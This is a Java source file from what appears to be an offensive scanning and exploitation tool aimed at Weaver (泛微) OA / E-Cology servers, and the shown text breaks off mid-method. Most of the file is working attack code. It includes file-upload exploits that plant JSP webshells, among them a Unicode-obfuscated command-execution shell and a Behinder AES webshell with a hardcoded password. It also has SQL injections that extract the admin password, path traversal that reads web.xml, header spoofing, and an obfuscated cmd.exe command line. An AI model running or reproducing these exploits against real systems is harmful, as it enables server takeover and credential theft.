package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;
import sun.security.krb5.internal.crypto.Des;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.nio.charset.StandardCharsets;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@BasicMapping(uri ="泛微OA")
public class WeaverController  extends Controller implements BasicController{
    public static String[] SupportVul; //初始化支持的漏洞
    public static String name = "泛微";
    public WeaverController(){

    }
    @VulnerabilityDescriptionMapping(Description = "泛微OA uploadfile 任意文件上传",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_uploadfile(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  泛微OA uploadfile 任意文件上传");
        String url = "/Api/portal/fileupload/uploadfile";
        String url2 = "/OfficeServer";
        String data = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                "Content-Disposition: form-data; name=\"secId\"\r\n"+
                "\r\n"+
                "1\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n"+
                "Content-Disposition: form-data; name=\"Filedata\"; filename=\"config_application.jsp\"\r\n" +
                "\r\n" +
                "Shellcode\r\n" +
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n"+
                "Content-Disposition: form-data; name=\"plandetailid\"\r\n"+
                "\r\n"+
                "1\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n";
        String data1 = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                "Content-Disposition: form-data; name=\"aaa\"\r\n"+
                "\r\n" +
                "{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'TFASDID'}\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [-] 文件读取失败");
                    }
                }catch (Exception e){

                }
                String payload = "<% java.io.InputStream in = Runtime.getRuntime().exec(request.\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072(\"i\")).getInputStream();\n" +
                        "\tint a = -1; byte[] b = new byte[2048]; \n" +
                        "\twhile((a=in.read(b))!=-1){\n" +
                        "\t out.println(new String(b)); }  %>";
                String payload2 = "<%@ page language=\"java\" contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"%>\n" +
                        "<%@ page import=\"java.io.*\"%>\n" +
                        "<%@ page import=\"java.lang.reflect.Constructor\" %>\n" +
                        "<%@ page import=\"java.lang.reflect.Method\" %>\n" +
                        "<%@ include file = \"1.jpg\" %>";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认为特制webshell");
                }
                //第一次释放图片马
                String shellpath = Utils.getRandomString(4)+".jsp";
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                HttpRequest httpRequest4 = new HttpRequest(target+url2);
                httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest3.addHeaders("x-forwarded-for","127.0.0.1");
                String data3 = data.replace("Shellcode",payload);
                httpRequest4.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest4.addHeaders("x-forwarded-for","127.0.0.1");
                data3 = data3.replace("config_application.jsp",shellpath.replace(".jsp",".jpg"));
                Response result3 = httpRequest3.Post(data3);
                Pattern pattern1 = Pattern.compile("\"fileid\":[0-9]*");
                Matcher id1 = pattern1.matcher(result3.responseBody);
                String id2;
                if (id1.find()){
                    id2 = id1.group(0);
                    httpRequest4.Post(data1.replace("TFASDID",id2.replace("\"fileid\":","")));
                }
                else{
                    WriteLog("第二个请求失败");
                }
//第二次释放文件包含文件
                HttpRequest httpRequest5 = new HttpRequest(target+url);
                HttpRequest httpRequest6 = new HttpRequest(target+url2);
                httpRequest5.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest5.addHeaders("x-forwarded-for","127.0.0.1");
                String data4 = data.replace("Shellcode",payload2.replace("1.jpg",shellpath.replace(".jsp",".jpg")));
                data4 = data4.replace("config_application.jsp",shellpath);
                Response result4 = httpRequest5.Post(data4);
                httpRequest6.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest6.addHeaders("x-forwarded-for","127.0.0.1");
                Pattern pattern2 = Pattern.compile("\"fileid\":[0-9]*");
                Matcher id3 = pattern2.matcher(result4.responseBody);
                String id4;
                if (id3.find()){
                    id4 = id3.group(0);
                    httpRequest4.Post(data1.replace("TFASDID",id4.replace("\"fileid\":","")));
                }
                else{
                    WriteLog("第二个请求失败");
                }




                //-----------------
                Response result1 = new HttpRequest(target +"/"+shellpath.replace(".jsp",".jpg")).Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +"/"+shellpath+"?i=cmd.exe /c echo 123\r\n");
                    WriteExpLog("cmd.exe /c forfiles /p %COMSPEC:~0,19% /s /c \"cmd /c @file -c  command;exit\" /m po*l.*e");
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +"/"+shellpath);
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

                }
                break;
            case POC:
                String targetUrl = target+url;
                String random = Utils.getRandomString(4)+".jsp";
                HttpRequest httpRequest = new HttpRequest(targetUrl);
                httpRequest.addHeaders("","");
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest.addHeaders("x-forwarded-for","127.0.0.1");
                data = data.replace("Shellcode","helloword");
                data = data.replace("config_application.jsp",random);
                HttpRequest httpRequest1 =  new HttpRequest(target+url2);
                httpRequest1.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest1.addHeaders("x-forwarded-for","127.0.0.1");
                Response result2 =httpRequest.Post(data);
                Pattern pattern = Pattern.compile("\"fileid\":[0-9]*");
                Matcher id = pattern.matcher(result2.responseBody);
                String ids;
                if (id.find()){
                    ids = id.group(0);
                    httpRequest1.Post(data1.replace("TFASDID",ids.replace("\"fileid\":","")));
                }

//                System.out.println(ids);
//                httpRequest1.Post(data1);
                Response result = new HttpRequest(target+"/"+random).Get("");
                if(result.statusCode==200 && result.responseBody.contains("helloword")){
                    WriteLog("\n [*]存在漏洞");
                    WriteLog("\n [*]写入地址："+target+"/"+random );
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                }
        }
    }
    @VulnerabilityDescriptionMapping(Description = "泛微OA uploaderOperate.jsp 任意文件上传",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_uploaderOperate(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  泛微OA uploaderOperate.jsp 任意文件上传");
        String url = "/workrelate/plan/util/uploaderOperate.jsp";
        String url2 = "/OfficeServer";
        String data = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                "Content-Disposition: form-data; name=\"secId\"\r\n"+
                "\r\n"+
                "1\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n"+
                "Content-Disposition: form-data; name=\"Filedata\"; filename=\"config_application.jsp\"\r\n" +
                "\r\n" +
                "Shellcode\r\n" +
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n"+
                "Content-Disposition: form-data; name=\"plandetailid\"\r\n"+
                "\r\n"+
                "1\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n";
        String data1 = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                "Content-Disposition: form-data; name=\"aaa\"\r\n"+
                "\r\n" +
                "{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'TFASDID'}\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [-] 文件读取失败");
                    }
                }catch (Exception e){

                }
                String payload = "<% java.io.InputStream in = Runtime.getRuntime().exec(request.\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072(\"i\")).getInputStream();\n" +
                        "\tint a = -1; byte[] b = new byte[2048]; \n" +
                        "\twhile((a=in.read(b))!=-1){\n" +
                        "\t out.println(new String(b)); }  %>";
                String payload2 = "<%@ page language=\"java\" contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"%>\n" +
                        "<%@ page import=\"java.io.*\"%>\n" +
                        "<%@ page import=\"java.lang.reflect.Constructor\" %>\n" +
                        "<%@ page import=\"java.lang.reflect.Method\" %>\n" +
                        "<%@ include file = \"1.jpg\" %>";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认为特制webshell");
                }
                //第一次释放图片马
                String shellpath = Utils.getRandomString(4)+".jsp";
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                HttpRequest httpRequest4 = new HttpRequest(target+url2);
                httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest3.addHeaders("x-forwarded-for","127.0.0.1");
                String data3 = data.replace("Shellcode",payload);
                httpRequest4.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest4.addHeaders("x-forwarded-for","127.0.0.1");
                data3 = data3.replace("config_application.jsp",shellpath.replace(".jsp",".jpg"));
                Response result3 = httpRequest3.Post(data3);
                Pattern pattern1 = Pattern.compile("fileid=[0-9]*");
                Matcher id1 = pattern1.matcher(result3.responseBody);
                String id2;
                if (id1.find()){
                    id2 = id1.group(0);
                    httpRequest4.Post(data1.replace("TFASDID",id2.replace("fileid=","")));
                }
                else{
                    WriteLog("第二个请求失败");
                }
//第二次释放文件包含文件
                HttpRequest httpRequest5 = new HttpRequest(target+url);
                HttpRequest httpRequest6 = new HttpRequest(target+url2);
                httpRequest5.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest5.addHeaders("x-forwarded-for","127.0.0.1");
                String data4 = data.replace("Shellcode",payload2.replace("1.jpg",shellpath.replace(".jsp",".jpg")));
                data4 = data4.replace("config_application.jsp",shellpath);
                Response result4 = httpRequest5.Post(data4);
                httpRequest6.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest6.addHeaders("x-forwarded-for","127.0.0.1");
                Pattern pattern2 = Pattern.compile("fileid=[0-9]*");
                Matcher id3 = pattern2.matcher(result4.responseBody);
                String id4;
                if (id3.find()){
                    id4 = id3.group(0);
                    httpRequest4.Post(data1.replace("TFASDID",id4.replace("fileid=","")));
                }
                else{
                    WriteLog("第二个请求失败");
                }




                //-----------------
                Response result1 = new HttpRequest(target +"/"+shellpath.replace(".jsp",".jpg")).Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +"/"+shellpath+"?i=cmd.exe /c echo 123");
//                    WriteLog("POST方式，参数为i=cmd.exe /c echo 123");
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +"/"+shellpath);
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

                }
                break;
            case POC:
                String targetUrl = target+url;
                String random = Utils.getRandomString(4)+".jsp";
                HttpRequest httpRequest = new HttpRequest(targetUrl);
                httpRequest.addHeaders("","");
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest.addHeaders("x-forwarded-for","127.0.0.1");
                data = data.replace("Shellcode","helloword");
                data = data.replace("config_application.jsp",random);
                HttpRequest httpRequest1 =  new HttpRequest(target+url2);
                httpRequest1.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest1.addHeaders("x-forwarded-for","127.0.0.1");
                Response result2 =httpRequest.Post(data);
                Pattern pattern = Pattern.compile("fileid=[0-9]*");
                Matcher id = pattern.matcher(result2.responseBody);
                String ids;
                if (id.find()){
                    ids = id.group(0);
                    httpRequest1.Post(data1.replace("TFASDID",ids.replace("fileid=","")));
                }

//                System.out.println(ids);
//                httpRequest1.Post(data1);
                Response result = new HttpRequest(target+"/"+random).Get("");
                if(result.statusCode==200 && result.responseBody.contains("helloword")){
                    WriteLog("\n [*]存在漏洞");
                    WriteLog("\n [*]写入地址："+target+"/"+random );
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                }
        }
    }
    @VulnerabilityDescriptionMapping(Description="泛微OA ln.FileDownload 任意文件读取漏洞" ,SupportVulType= com.achuna33.SupportType.SupportVul.信息泄露)
    public void vul_ln_FileDownload(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA ln.FileDownload 任意文件读取漏洞");

        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+"/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml");
                String data = "";
                Response result = httpRequest.Get(data);
                if(result.statusCode==200 && result.responseBody.contains("pattern")){
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+"/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml" );
                }else {
                    WriteLog("\n 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
    @VulnerabilityDescriptionMapping(Description = "泛微OA getdata.jsp SQL注入漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
    public void vul_getdataSqlInjection(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA getdata.jsp SQL注入漏洞");
        String url = "/js/hrm/getdata.jsp";
        switch (type){
            case EXP:
                break;
            case POC:
                String targetUrl = target+url+"?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager";
                HttpRequest httpRequest = new HttpRequest(targetUrl);
                String data = "";
                Response result = httpRequest.Get(data);
                if(result.statusCode==200 ){
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+targetUrl );
                }else {
                    WriteLog("\n 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }

@VulnerabilityDescriptionMapping(Description = "泛微OA uploadOperation.jsp 任意文件上传",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
public void vul_uploadOperation(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA uploadOperation.jsp 任意文件上传");
    String url = "/page/exportImport/uploadOperation.jsp";
    String data = "------WebKitFormBoundary6XgyjB6SeCArD3Hc\r\n" +
            "Content-Disposition: form-data; name=\"file\"; filename=\"test.jsp\"\r\n" +
            "Content-Type: application/octet-stream\r\n" +
            "\r\n" +
            "Shellcode\r\n" +
            "------WebKitFormBoundary6XgyjB6SeCArD3Hc--\r\n";
    switch (type){
        case EXP:
            String path = null;
            String mypayload = null;
            try {
                path = (String) args[0];
                try {
                    byte[] bytes = Utils.readFile(path);
                    mypayload = new String(bytes);
                }catch (Exception e){
                    WriteExpLog("\n [*] 文件读取失败");
                }
            }catch (Exception e){

            }
            String payload = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";

            if (mypayload!=null){
                payload = mypayload;
            }else {
                WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
            }
            String shellpath = Utils.getRandomString(4)+".jsp";
            HttpRequest httpRequest3 = new HttpRequest(target+url);
            httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc");
            httpRequest3.addHeaders("x-forwarded-for","127.0.0.1");
            data = data.replace("Shellcode",payload);
            data = data.replace("test.jsp",shellpath);

            httpRequest3.Post(data);

            Response result1 = new HttpRequest(target +"/page/exportImport/fileTransfer/"+shellpath).Get("");
            if(result1.statusCode==200){
                WriteExpLog("\n[*] shell path:\n"+target +"/page/exportImport/fileTransfer/"+shellpath);
            }else {
                WriteExpLog("\n 访问失败:\n"+target +"/page/exportImport/fileTransfer/"+shellpath);
                WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

            }
            break;
        case POC:
            String targetUrl = target+url;
            String random = Utils.getRandomString(4)+".jsp";
            HttpRequest httpRequest = new HttpRequest(targetUrl);
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc");
            httpRequest.addHeaders("x-forwarded-for","127.0.0.1");
            data = data.replace("Shellcode","helloword");
            data = data.replace("test.jsp",random);
            httpRequest.Post(data);
            Response result = new HttpRequest(target+"/page/exportImport/fileTransfer/"+random).Get("");
            if(result.statusCode==200 && result.responseBody.contains("helloword")){
                WriteLog("\n 存在漏洞");
                WriteLog("\n 写入地址："+target+"/page/exportImport/fileTransfer/"+random );
            }else {
                WriteLog("\n 不存在漏洞");
            }
    }
}

@VulnerabilityDescriptionMapping(Description = "泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202",SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
    public void vul_LoginSSOSqlInjection(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202");
    String url = "/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager";
    switch (type){
        case EXP:
            break;
        case POC:
            HttpRequest httpRequest = new HttpRequest(target+url);
            String data = "";
            Response result = httpRequest.Get(data);
            if(result.statusCode==200 ){
                WriteLog("\n 存在漏洞");
                WriteLog("\n 访问地址："+target+url );
            }else {
                WriteLog("\n 不存在漏洞");
            }
            //WriteLog("\n"+result.responseBody);
    }
}
@VulnerabilityDescriptionMapping(Description = "泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204",SupportVulType = com.achuna33.SupportType.SupportVul.RuntimeExec)
    public void vul_BshServlet(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204");
        String url = "/weaver/bsh.servlet.BshServlet/";
    switch (type){
        case EXP:
            break;
        case POC:
            HttpRequest httpRequest = new HttpRequest(target+url);
            String data = "";
            Response result = httpRequest.Get(data);
            if(result.statusCode==200 ){
                WriteLog("\n 存在漏洞");
                WriteLog("\n 访问地址："+target+url );
            }else {
                WriteLog("\n 不存在漏洞");
            }
            //WriteLog("\n"+result.responseBody);
    }
}
@VulnerabilityDescriptionMapping(Description = "泛微OA E-Cology users.data 敏感信息泄漏",SupportVulType = com.achuna33.SupportType.SupportVul.信息泄露)
    public void vul_UserData(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA E-Cology users.data 敏感信息泄漏");

    String url = "/messager/users.data";
    switch (type){
        case EXP:
            break;
        case POC:
            HttpRequest httpRequest = new HttpRequest(target+url);
            String data = "";
            Response result = httpRequest.Get(data);
            if(result.statusCode==200 ){
                WriteLog("\n 存在漏洞");
                WriteLog("\n 访问地址："+target+url );
            }else {
                WriteLog("\n 不存在漏洞");
            }
            //WriteLog("\n"+result.responseBody);
    }
}

@VulnerabilityDescriptionMapping(Description = "泛微OA E-Cology HrmCareerApplyPerView.jsp SQL 注入",SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
    public void vul_HrmCareerApplyPerView(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA E-Cology HrmCareerApplyPerView.jsp SQL 注入");

    String url = "/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7";
    switch (type){
        case EXP:
            break;
        case POC:
            HttpRequest httpRequest = new HttpRequest(target+url);
            String data = "";
            Response result = httpRequest.Get(data);
            if(result.statusCode==200 && result.responseBody.contains("<tr class=")){
                WriteLog("\n 存在漏洞");
                WriteLog("\n 访问地址："+target+url );
            }else {
                WriteLog("\n 不存在漏洞");
            }
            //WriteLog("\n"+result.responseBody);
    }

}

@VulnerabilityDescriptionMapping(Description = "泛微OA WorkflowServiceXml xml 注入漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.RuntimeExec)
public void vul_WorkflowServiceXml(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        String payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">\n" +
                "   <soapenv:Header/>\n" +
                "   <soapenv:Body>\n" +
                "      <web:doCreateWorkflowRequest>\n" +
                "    <web:string></web:string>\n" +
                "        <web:string>2</web:string>\n" +
                "      </web:doCreateWorkflowRequest>\n" +
                "   </soapenv:Body>\n" +
                "</soapenv:Envelope>";
    WriteLog("\n[*]开始检测：  泛微OA WorkflowServiceXml xml 注入漏洞");

    String url = "/services%20/WorkflowServiceXml";
    switch (type){
        case EXP:
            break;
        case POC:
            HttpRequest httpRequest = new HttpRequest(target+url);
            httpRequest.addHeaders("Content-Type","text/xml;charset=UTF-8");
            Response result = httpRequest.Post(payload);
            if(result.statusCode==200 && result.responseBody.contains("soap:Body")){
                WriteLog("\n[*] 存在漏洞");
                WriteLog("\n[*] 访问地址："+target+url );
                WriteLog("\n[*] 访问相关链接：https://www.anquanke.com/post/id/239865");

            }else {
                WriteLog("\n 不存在漏洞");
            }
            //WriteLog("\n"+result.responseBody);
    }
}

    @VulnerabilityDescriptionMapping(Description = "泛微OA sysinterface codeEdit.jsp 任意文件上传漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_codeEdit(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA sysinterface codeEdit.jsp 任意文件上传漏洞");

        String url = "/sysinterface/codeEdit.jsp";
        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                httpRequest.addHeaders("Content-Type","text/xml;charset=UTF-8");
                Response result = httpRequest.Get("");
                if(result.statusCode==200 && result.responseBody.contains("import")){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );
                    WriteLog("\n[*] 访问相关链接：https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20sysinterfacecodeEdit.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md");

                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }

    @VulnerabilityDescriptionMapping(Description = "泛微OA WorkflowCenterTreeData SQL注入漏洞 ",SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
    public void vul_WorkflowCenterTreeData(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA WorkflowCenterTreeData SQL注入漏洞 ");

        String url = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333";
        String data = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1";
        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                httpRequest.addHeaders("Content-Type","text/xml;charset=UTF-8");
                Response result = httpRequest.Post(data);
                if(result.statusCode==200 && result.responseBody.contains("\"id\"")){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );

                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.信息泄露)
    public void vul_SignatureDownLoad(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞 ");

